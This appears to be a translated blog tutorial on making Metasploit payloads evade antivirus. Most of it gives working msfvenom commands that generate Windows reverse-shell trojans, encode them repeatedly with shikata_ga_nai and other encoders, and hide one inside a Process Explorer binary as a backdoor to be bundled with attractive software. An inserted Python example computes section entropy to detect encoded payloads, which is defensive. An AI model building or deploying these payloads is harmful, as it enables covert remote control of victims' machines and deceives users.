Payload AV evasion techniques

Most antivirus software uses signatures to identify malicious code. The antivirus engine uses these signatures to scan the disk and running processes for matches.

To avoid antivirus software, you can give the attack payload a unique signature that does not match any antivirus signature.

During direct exploitation the Metasploit payload runs only in memory and never writes anything to disk; after we exploit the target and upload the payload, most antivirus software cannot detect it.

1. The MSF payload generator, msfvenom, can create a Trojan with two separate commands

msfvenom -p windows/shell_reverse_tcp --payload-options

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.140 LPORT=31337 -f exe -o payload1.exe   (LHOST is your IP, LPORT your listening port)

This produces a Windows PE (Portable Executable) Trojan.

2. One of the best ways to avoid antivirus detection is to use the MSF encoders

Take Baidu Antivirus as an example. Before actually deploying the payload on the target, we need to understand which antivirus program the target runs, so that the Trojan can run smoothly.

Use an MSF encoder to re-encode the Trojan file. This changes the shape of the code inside the executable, similar to base64-encoding an e-mail attachment.

When the file is run, the MSF decoder stub decodes the original program into memory and executes it.

msfvenom -l encoders

Select an encoder for the target environment (such as x86, Linux, PPC, etc.); different operating system platforms need different formats. For example, 64-bit Windows 7 uses x64 and 32-bit Windows 7 uses x86.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.140 LPORT=31337 -e x86/shikata_ga_nai -f exe -o payload2.exe   (note that the x86 encoder is selected with the -e parameter)

Submitting payload2.exe to Baidu Antivirus, it is still detected. This calls for repeated encoding, trying more iterations step by step.

As we keep encoding the file, the antivirus vendors also regularly update their virus databases, so that the encoded file is detected again.

Above we used the shikata_ga_nai encoder; sometimes it evades detection and sometimes it does not.

Here we encode the Trojan several more times with the following command

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.140 LPORT=31337 -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -i 10 -f raw | msfvenom -e x86/countdown -a x86 --platform windows -i 10 -f exe -o payload3.exe

Here the payload was encoded a total of 35 times, and it may still fail to evade antivirus detection.

Custom executable template

Normally, when msfvenom runs, the payload is embedded in a default executable template, data/templates/template.exe. This template is always a focus for antivirus vendors when they update their products, so we do not use the default template.

Use a Microsoft program as the custom executable template.
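As an added example (not from the original post), the defender's side of the encoding step: a Python script that walks a PE file's section table and computes the Shannon entropy of each section. A payload encoded many times looks like random bytes, so a high-entropy section is a heuristic that can be used alongside the signature matching described above; the sample PE here is constructed inline for testing.

```python
import math
import struct

def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for empty or constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def pe_sections(pe: bytes):
    """Yield (name, raw_bytes) for each entry in the PE section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad NT signature")
    coff = e_lfanew + 4                      # start of the 20-byte COFF file header
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size             # section headers follow the optional header
    for i in range(num_sections):
        hdr = table + i * 40                 # each IMAGE_SECTION_HEADER is 40 bytes
        name = pe[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, hdr + 16)
        yield name, pe[raw_ptr:raw_ptr + raw_size]

def flag_high_entropy_sections(pe: bytes, threshold: float = 7.0) -> list:
    """Names of sections whose entropy exceeds the threshold (packed or encoded data)."""
    return [name for name, data in pe_sections(pe) if shannon_entropy(data) > threshold]

def build_sample_pe(sections) -> bytes:
    """Constructed minimal PE image (DOS stub, COFF header, section table, raw data) for testing."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)          # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x102)  # i386, no optional header
    headers_len = 64 + 4 + 20 + 40 * len(sections)
    table, body = b"", b""
    for name, data in sections:
        table += struct.pack("<8sIIIIIIHHI", name, len(data), 0, len(data), headers_len + len(body), 0, 0, 0, 0, 0)
        body += data
    return dos + b"PE\0\0" + coff + table + body

if __name__ == "__main__":
    # Constructed sample: plain code bytes next to a uniform blob standing in for encoded shellcode.
    sample = build_sample_pe([(b".text", b"\x55\x8b\xec" + b"\x90" * 200 + b"\xc3"), (b".data", bytes(range(256)) * 4)])
    print(flag_high_entropy_sections(sample))  # ['.data']
```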

wget http://download.sysinternals.com/files/ProcessExplorer.zip 

unzip ../ProcessExplorer.zip

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.140 LPORT=8080 -e x86/shikata_ga_nai -x procexp.exe -i 5 -f exe -o /var/www/pe_backdoor.exe

Download Process Explorer, extract it, and use the -x parameter to specify the Process Explorer binary as our custom template.

This time there is a very good chance that antivirus software will not detect it.

When a user runs a backdoor executable like the one we just generated, nothing visible happens, which can make the user suspicious. Usually it is bundled with other files, software, plug-ins and similar things that attract users. Bundling is easy, just one more command, but I will stop here and not write further.


Source: www.cnblogs.com/sec875/p/11028883.html